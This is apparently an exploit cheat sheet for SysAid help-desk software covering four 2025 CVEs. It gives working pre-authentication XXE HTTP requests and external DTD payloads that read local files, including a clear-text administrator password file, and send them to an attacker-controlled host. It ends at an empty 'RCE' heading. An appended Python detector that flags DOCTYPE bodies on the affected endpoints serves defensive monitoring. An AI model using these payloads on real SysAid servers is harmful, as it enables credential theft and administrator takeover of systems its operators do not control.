SysAid

SysAid Exploit

CVE-2025-2775, CVE-2025-2776, CVE-2025-2777, CVE-2025-2778

Pre-auth RCE - SysAid ≥ 23.3.40

Multiple Pre-Auth XXE

POST /mdm/checkin HTTP/1.1
Host: target
Content-Type: application/xml
Content-Length: 129

<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ENTITY % foo SYSTEM "http://poc-server/watchTowr.dtd">
%foo;
]>

POST /mdm/serverurl HTTP/1.1
Host: target
Content-Type: application/xml
Content-Length: 129

<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ENTITY % foo SYSTEM "http://poc-server/watchTowr.dtd">
%foo;
]>

POST /lshw?osVer=a&osCode=b&osKernel=c&agentVersion=e&serial=f HTTP/1.1
Host: target
Content-Type: application/xml
Content-Length: 129

<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ENTITY % foo SYSTEM "http://poc-server/watchTowr.dtd">
%foo;
]>

Exfiltration

exfil.dtd:

<!ENTITY % d SYSTEM "file:///C:\\windows\\win.ini">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'http://192.168.8.107/?e=%d;'>">

POST /mdm/serverurl HTTP/1.1
Host: 192.168.8.162:8080
Content-Length: 119

<?xml version="1.0"?>
<!DOCTYPE cdl [<!ENTITY % asd SYSTEM "http://192.168.8.107/exfil.dtd">%asd;%c;]>
<cdl>&rrr;</cdl>

Admin Account Takeover

C:\\Program Files\\SysAidServer\\logs\\InitAccount.cmd

This file is created during installation by SysAid and contains the clear-text password of the main administrator in its first line.

exfil.dtd:

<!ENTITY % d SYSTEM "file:///C:\\Program Files\\SysAidServer\\logs\\InitAccount.cmd">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'http://192.168.8.107/?e=%d;'>">

POST /mdm/serverurl HTTP/1.1
Host: target
Content-Type: application/xml
Content-Length: 121

<?xml version="1.0"?>
<!DOCTYPE cdl [<!ENTITY % asd SYSTEM "http://192.168.8.107/exfil.dtd">%asd;%c;]>
<cdl>&rrr;</cdl>
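
For detection, every request above has the same shape: a POST to /mdm/checkin, /mdm/serverurl or /lshw whose XML body declares a DOCTYPE. The following is an added example (not from the original page or from SysAid) that flags that shape in captured raw requests; the function names, the .example hosts, the sample bodies and the assumption that legitimate agent traffic carries no DTD are all assumptions of this example.

```python
import re

# Pre-auth endpoints named on this page that accept an XML body.
XXE_PATHS = ("/mdm/checkin", "/mdm/serverurl", "/lshw")
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.I)
# <!ENTITY [%] name SYSTEM "uri"> : general or parameter entity with an external identifier
EXT_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?:%\s+)?[\w.-]+\s+SYSTEM\s+[\"']([^\"']+)[\"']", re.I)


def inspect_request(raw):
    """Return a finding for one raw HTTP request, or None if nothing matches."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line = head.split("\n", 1)[0].split()
    if len(request_line) < 2 or request_line[0].upper() != "POST":
        return None
    path = request_line[1].split("?", 1)[0].rstrip("/").lower()
    if path not in XXE_PATHS or not DOCTYPE_RE.search(body):
        return None
    # Assumption: legitimate agent traffic to these paths never declares a DTD,
    # so any DOCTYPE is reported; SYSTEM URIs are kept as pivots for proxy/DNS logs.
    return {"path": path, "external_ids": EXT_ENTITY_RE.findall(body)}


def scan(requests):
    """Inspect many captured requests and return only the findings."""
    return [f for f in map(inspect_request, requests) if f]


# Constructed samples (hosts under .example are placeholders, not real indicators).
SAMPLE_XXE = (
    "POST /mdm/serverurl HTTP/1.1\r\nHost: sysaid.example\r\n"
    "Content-Type: application/xml\r\n\r\n"
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE cdl [<!ENTITY % asd SYSTEM "http://collector.example/exfil.dtd">%asd;%c;]>\n'
    "<cdl>&rrr;</cdl>"
)
SAMPLE_LSHW = (
    "POST /lshw?osVer=a&osCode=b HTTP/1.1\nHost: sysaid.example\n\n"
    '<!DOCTYPE foo [<!ENTITY % foo SYSTEM "http://collector.example/a.dtd"> %foo; ]>'
)
SAMPLE_BENIGN = (
    "POST /mdm/checkin HTTP/1.1\nHost: sysaid.example\n\n"
    '<?xml version="1.0"?><checkin><serial>f</serial></checkin>'
)

if __name__ == "__main__":
    for finding in scan([SAMPLE_XXE, SAMPLE_LSHW, SAMPLE_BENIGN]):
        print(finding)
```

The extracted SYSTEM URIs are useful for correlating with outbound connections from the SysAid server itself, since the external DTD is fetched by the server.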

RCE
